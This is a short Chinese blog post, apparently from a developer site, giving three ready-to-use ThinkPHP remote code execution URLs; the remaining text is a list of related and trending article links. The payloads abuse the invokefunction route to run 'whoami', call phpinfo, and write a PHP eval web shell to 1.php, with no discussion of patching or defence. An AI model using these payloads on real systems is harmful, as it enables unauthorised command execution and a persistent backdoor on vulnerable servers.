Thinkphp(TP)

谪仙1232024-09-24 12:16

1.远程命令执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2.远程代码执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

3.getshell

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST[cmd]);?>' >1.php

相关推荐
Hacker_LaoYi1 小时前
x安全服务 y安全体系 z网络安全模型 网络安全体系设计
网络·安全·web安全
黑客KKKing8 小时前
(网络安全)渗透测试
网络·安全·web安全·电脑
Hacker_Fuchen9 小时前
android 网络防护 手机网络安全怎么防
网络·web安全·智能手机
csbDD16 小时前
2025年网络安全(黑客技术)三个月自学手册
linux·网络·python·安全·web安全
阿湯哥17 小时前
越权漏洞及其修复方法
网络·安全·web安全
爱编程的小庄19 小时前
web网络安全:SQL 注入攻击
前端·sql·web安全
xing.yu.CTF19 小时前
Web入侵实战分析-常见web攻击类应急处置实验2
运维·服务器·windows·web安全·apache·php漏洞·phpstudy后门漏洞
黑客KKKing1 天前
网络安全与防范
安全·web安全
网络安全指导员1 天前
网络安全-openssl工具
安全·web安全
尘佑不尘1 天前
Prime_Series_Level-1靶场,wpscan爆破,LFI漏洞,wordpress更改文件getshell,ubuntu内核提权
linux·web安全·渗透测试·vulnhub
热门推荐
01本地部署DeepSeek教程(Mac版本)02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek本地部署详细指南04太炸裂了!清华大学deepseek从入门到精通使用手册又出第三版了,《普通人如何抓住DeepSeek红利》(无套路,直接下载)05DeepSeek各版本说明与优缺点分析06DeepSeek r1本地安装全指南07本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程08DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具09在Windows下安装Ollama并体验DeepSeek r1大模型10Page Assist - 本地Deepseek模型 Web UI 的安装和使用